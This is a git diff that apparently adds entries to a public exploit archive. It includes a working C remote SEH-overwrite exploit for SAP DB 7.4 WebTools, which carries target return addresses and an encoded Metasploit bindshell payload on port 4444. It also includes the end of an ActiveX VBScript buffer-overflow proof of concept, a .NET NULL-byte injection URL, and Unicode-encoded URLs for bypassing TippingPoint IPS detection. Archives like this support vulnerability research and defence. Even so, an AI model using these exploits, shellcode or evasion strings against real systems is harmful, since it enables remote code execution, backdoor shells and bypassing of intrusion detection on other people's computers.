+Exploiting this issue allows remote attackers to execute arbitrary code in the context of applications using the affected ActiveX control and possibly to compromise affected computers. 
+
+ <html>
+ <object classid='clsid:156BF4B7-AE3A-4365-BD88-95A75AF8F09D' id='test'></object>
+  <script language = 'vbscript'>
+   
+   buff             = String(222, "A")
+
+   get_EBP          = "cccc"
+
+   get_EIP          = unescape("aaaa")
+
+   buf1             = unescape("bbbb")
+
+   second_exception = unescape("%00%00%92%00")
+
+   first_exception  = unescape("%00%00%92%00")
+
+   buf2             = String(4000, "B")
+
+   egg              = buff + get_EBP + get_EIP + buf1 + second_exception + first_exception + buf2
+
+   test.queryHub egg
+ 
+ </script>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/remote/30278.c b/platforms/windows/remote/30278.c
new file mode 100755
index 000000000..7378b36ad
--- /dev/null
+++ b/platforms/windows/remote/30278.c
@@ -0,0 +1,472 @@
+source: http://www.securityfocus.com/bid/24773/info
+
+SAP DB Web Server is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
+
+Successfully exploiting these issues will allow an attacker to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will result in a denial-of-service condition.
+
+/* Dreatica-FXP crew
+* 
+* ----------------------------------------
+* Target         : SAP DB 7.4 WebTools 
+* Site           : http://www.sapdb.org
+* Found by       : NGSSoftware Insight Security Research 
+* ----------------------------------------
+* Exploit        : SAP DB 7.4 WebTools Remote SEH overwrite exploit
+* Exploit date   : 07.07.2007
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS             : Windows 2000 ALL SP 
+* Crew           : Dreatica-FXP
+* ----------------------------------------
+* Info           :   This is the SEH overwrite realization of the vulnerability found by 
+*                  NGSSoftware Insight Security Research, it is trivial. We send a big amount
+*                  of bytes to server (about 20000) and overwrite SEH. Aproximatly at the 9900
+*                  byte we trigger an exception and our shellcode is executed.
+* ----------------------------------------
+* Compiling      :
+*  To compile this exploit you need:
+*    1. Windows C/C++ compiler   
+*    2. WinSock 2
+* ----------------------------------------
+* Thanks to      :
+*       1. NGSSoftware Insight Security Research ( http://www.ngssoftware.com/ )
+*       2. The Metasploit project                ( http://metasploit.com       ) 
+*       3. Dreatica-FXP crew                     ( http://www.dreatica.cl      )
+* ----------------------------------------
+* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be 
+* responsible for any damage, caused by that code.
+************************************************************************************
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <winsock2.h>
+#include <ctime>
+#pragma comment(lib,"ws2_32")
+
+
+void usage(char * s);
+void logo();
+void end_logo();
+void prepare_shellcode(unsigned char * fsh, int sh);
+void make_buffer(unsigned char * buf, int itarget, int sh);
+int send_buffer(unsigned char * buf, char * remotehost, int port);
+SOCKET do_connect (char *remotehost, int port);
+int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
+
+static long timeout = 2000 ; // 2 sec
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring);
+char	*optarg;		// global argument pointer
+int		optind = 0, opterr; 	// global argv index
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+
+struct _target{
+	const char *t ;
+	unsigned long ret ;
+} targets[]=
+	{
+		{"UNIVERSAL: SAP DB 7.4.3 [WAPI.dll]",          0x1003a218 },// call ebx
+		{"Windows 2000 Pro SP4 RUSSIAN [kernel32.dll]", 0x793a4a66 },// jmp ebx
+		{"Windows 2000 Pro SP4 ENGLISH [kernel32.dll]", 0x7c4e4a66 },// jmp ebx
+		{"Debug / DoS",                                 0x42424242 },
+		{NULL,                                          0x00000000 }
+	};
+
+
+struct {
+	const char * name;
+	int length;
+	char * shellcode;	
+}shellcodes[]={ 	
+	 {"Bindshell, port 4444   [ args: none ]", 696, 
+		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
+		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
+		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
+		"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32"
+		"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62"
+		"\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71"
+		"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c"
+		"\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47"
+		"\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35"
+		"\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c"
+		"\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a"
+		"\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a"
+		"\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64"
+		"\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34"
+		"\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50"
+		"\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64"
+		"\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31"
+		"\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69"
+		"\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30"
+		"\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78"
+		"\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f"
+		"\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73"
+		"\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e"
+		"\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62"
+		"\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71"
+		"\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65"
+		"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32"
+		"\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e"
+		"\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69"
+		"\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79"
+		"\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d"
+		"\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49"
+		"\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70"
+		"\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45"
+		"\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36"
+		"\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32"
+		"\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e"
+		"\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50"
+		"\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32"
+		"\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a"
+		"\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48"
+		"\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30"
+		"\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39"
+		"\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b"
+		"\x4f\x6a\x76\x6b\x4f\x78\x50\x42"		
+	 },	 
+	{NULL , NULL }
+};
+
+
+
+int main(int argc, char **argv)
+{
+	char * remotehost=NULL;
+	char default_remotehost[]="127.0.0.1";
+	char temp1[100], temp2[100];
+	int port, itarget, sh;
+	SOCKET s;
+	char c;	
+	int option_index=0;
+	logo();
+	WSADATA wsa;
+	WSAStartup(MAKEWORD(2,0), &wsa);
+	if(argc<2)
+	{
+		usage(argv[0]);		
+		return -1;
+	}
+
+	// set defaults
+	port=9999;
+	itarget=-1;
+	sh=0;
+	// ------------	
+	
+	while((c = getopt(argc, argv, "h:p:t:"))!= EOF)
+	{
+		switch (c)
+		{
+			case 'h':
+				remotehost=optarg;
+				break; 	
+			case 't':
+				sscanf(optarg, "%d", &itarget);
+				itarget--;
+				break;
+			case 'p':
+				sscanf(optarg, "%d", &port);
+				break;			
+			default:
+	            usage(argv[0]);
+				WSACleanup();
+			return -1;
+		}		
+	}	
+	if(remotehost == NULL) remotehost=default_remotehost;
+	memset(temp1,0,sizeof(temp1));
+	memset(temp2,0,sizeof(temp2));
+	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
+	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
+	sprintf(temp2, "%d", port);
+	memset(temp1,0,sizeof(temp1));
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+	printf(" #  Port    : %s%s# \n", temp2, temp1);
+	memset(temp1,0,sizeof(temp1));	
+	memset(temp2,0,sizeof(temp2));
+	sprintf(temp2, "%s", shellcodes[sh].name );
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
+	printf(" #  Payload : %s%s# \n", temp2, temp1);	
+	if(itarget!=-1)
+	{
+		memset(temp1,0,sizeof(temp1));	
+		memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);	
+		printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);		
+	}else
+	{
+		memset(temp1,0,sizeof(temp1));	
+		memset(temp1, '\x20' , 58 - strlen("Please select target") -1);	
+		printf(" #  Target  : %s%s# \n", "Please select target", temp1);
+	}
+	printf(" # ------------------------------------------------------------------- # \n");
+	fflush(stdout);
+	printf("   [+] Checking if server is online\n");
+	fflush(stdout);
+	s=do_connect(remotehost, port);   
+	if(s==-1)
+	{
+		printf("   [-] Server is OFFLINE\n");
+		end_logo();
+		return 0;
+	}
+	closesocket(s);
+	printf("   [+] Server is ONLINE\n");
+
+	
+	unsigned char buf[30000];
+	memset(buf,0,sizeof(buf));
+	fflush(stdout);
+	
+	make_buffer(buf, itarget, sh);
+	printf("   [+] Attacking buffer constructed\n");
+	if(send_buffer(buf, remotehost,port)==-1)
+	{
+		printf("   [-] Cannot exploit server %s\n", remotehost);
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+
+	printf("   [+] Buffer sent\n");
+	printf("   [+] Connect to %s:%d\n", remotehost, 4444);
+	end_logo();
+	WSACleanup();
+	return 0;
+}
+
+
+
+SOCKET do_connect (char *remotehost, int port)
+{
+   static struct hostent *host;
+   static struct sockaddr_in addr;
+   SOCKET s;	
+       host = gethostbyname(remotehost);
+       if (!host)
+       {
+           perror("[-] gethostbyname() failed");
+           return -1;
+       }
+       addr.sin_addr = *(struct in_addr*)host->h_addr;
+
+   s = socket(PF_INET, SOCK_STREAM, 0);
+   if (s == -1)
+   {
+       closesocket(s);
+       perror("socket() failed");
+       return -1;
+   }
+
+   addr.sin_port = htons(port);
+   addr.sin_family = AF_INET;
+
+	if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
+   {
+       closesocket(s);     
+       return -1;
+   }	
+
+   return s;
+}
+
+
+void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh)
+{
+	memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
+	*fshlength = shellcodes[sh].length;	
+}
+
+void make_buffer(unsigned char * buf, int itarget, int sh)
+{
+	// prepare shellcode
+	unsigned char fsh[10000];	
+	unsigned int fshlength;
+	memset(fsh, 0, sizeof(fsh));	
+	prepare_shellcode(fsh, &fshlength, sh);
+	// -----------------
+
+	// make buffer
+	unsigned char * cp=buf;		
+		
+		// HTTP request
+	memcpy(cp, "GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=", strlen("GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE="));
+	cp +=strlen((char *)cp);
+
+		// long request
+	memset(cp, 'A', 20774);
+	cp +=strlen((char *)cp);
+
+		// jmp over 6 bytes
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\xEB';
+	*cp++ = '\x06';
+	
+
+		// SEH handler
+	*cp++ = (char)((targets[itarget].ret      ) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >>  8) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
+
+		// jff
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	
+		// copy shellcode
+	memcpy(cp, fsh, fshlength);
+	cp+=fshlength;
+
+		// end of HTTP request
+	memcpy(cp, " HTTP/1.0\r\n\r\n", strlen(" HTTP/1.0\r\n\r\n"));
+	cp +=strlen((char *)cp);
+	// -----------------
+}
+
+
+
+int send_buffer(unsigned char * buf, char * remotehost, int port)
+{	
+	SOCKET sock;
+	int bytes;
+
+	sock = do_connect(remotehost, port);
+	if(sock==-1) printf("   [-] Failed to connect to server\n");		
+	bytes = send(sock, (char *)buf, (int)strlen((char *)buf), 0);
+	if (bytes<0) printf("   [-] Failed to send the buffer\n"); else printf("   [+] Sent %d bytes\n", bytes);	
+	closesocket(sock);
+	return 1;
+}
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring)
+{
+	static char *next = NULL;
+	if (optind == 0)
+		next = NULL;
+
+	optarg = NULL;
+
+	if (next == NULL || *next == '\0')
+	{
+		if (optind == 0)
+			optind++;
+
+		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+		{
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		if (strcmp(argv[optind], "--") == 0)
+		{
+			optind++;
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		next = argv[optind];
+		next++;		// skip past -
+		optind++;
+	}
+
+	char c = *next++;
+	char *cp = strchr(optstring, c);
+
+	if (cp == NULL || c == ':')
+		return '?';
+
+	cp++;
+	if (*cp == ':')
+	{
+		if (*next != '\0')
+		{
+			optarg = next;
+			next = NULL;
+		}
+		else if (optind < argc)
+		{
+			optarg = argv[optind];
+			optind++;
+		}
+		else
+		{
+			return '?';
+		}
+	}
+
+	return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+void usage(char * s)
+{	
+	printf("   Usage : %s -h <host> -p <port> -t <target>\n", s);
+	printf("   Arguments:\n");
+	printf("      -h <host>     host to connect\n");
+	printf("      -p <port>     port (default: 9999)\n");
+	printf("      -t <target>   target to attack\n");
+	printf("    Shellcodes:\n");
+	for(int i=0; shellcodes[i].name!=0;i++)
+	{
+		printf("       %d. %s\n",i+1,shellcodes[i].name);				
+	}	
+	printf("\n");
+	printf("    Targets:\n");
+	for(int j=0; targets[j].t!=0;j++)
+	{
+		printf("       %d. %s\n",j+1,targets[j].t);
+	}		
+	printf("\n");
+	end_logo();	
+}
+
+void logo()
+{
+	printf("\n\n");
+	printf(" ####################################################################### \n");	
+	printf(" #     ____                 __  _                  ______  __    _____ #\n");
+	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
+	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
+	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
+	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
+	printf(" #                                 crew                                #\n");
+	printf(" ####################################################################### \n");	
+	printf(" #  Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit         # \n");
+	printf(" #  Author  : Heretic2 (heretic2x@gmail.com                            # \n");
+	printf(" #  Research: NGSSoftware Insight Security Research                    # \n");
+	printf(" #  Version : 1.0 Public Release                                       # \n");
+	printf(" #  System  : Windows 2000 ALL SP                                      # \n");
+	printf(" #  Date    : 07.07.2007                                               # \n");
+	printf(" # ------------------------------------------------------------------- # \n");
+}
+
+void end_logo()
+{
+	printf(" # ------------------------------------------------------------------- # \n");
+	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
+	printf(" ####################################################################### \n\n");
+}
+
+// milw0rm.com [2007-07-07]
\ No newline at end of file
diff --git a/platforms/windows/remote/30281.txt b/platforms/windows/remote/30281.txt
new file mode 100755
index 000000000..df51dcd3f
--- /dev/null
+++ b/platforms/windows/remote/30281.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/24791/info
+
+Microsoft .NET Framework is prone to multiple NULL-byte injection vulnerabilities because it fails to adequately sanitize user-supplied data.
+
+An attacker can exploit these issues to access sensitive information that may aid in further attacks; other attacks are also possible. 
+
+http://www.example.com/[path]/somescript.asp%00 
\ No newline at end of file
diff --git a/platforms/windows/remote/30287.txt b/platforms/windows/remote/30287.txt
new file mode 100755
index 000000000..85d0bf028
--- /dev/null
+++ b/platforms/windows/remote/30287.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/24855/info
+
+TippingPoint IPS is prone to a detection-bypass vulnerability because the appliance fails to properly handle Unicode characters.
+
+A successful exploit of this issue may allow an attacker to bypass the filter and detection system of vulnerable appliances, allowing malicious URI traffic through. This will likely aid the attacker in further attacks.
+
+http://www.example.com/scripts%c0%afcmd.exe
+http://www.example.com/scripts%e0%80%afcmd.exe
+http://www.example.com/scripts%c1%9ccmd.exe 
\ No newline at end of file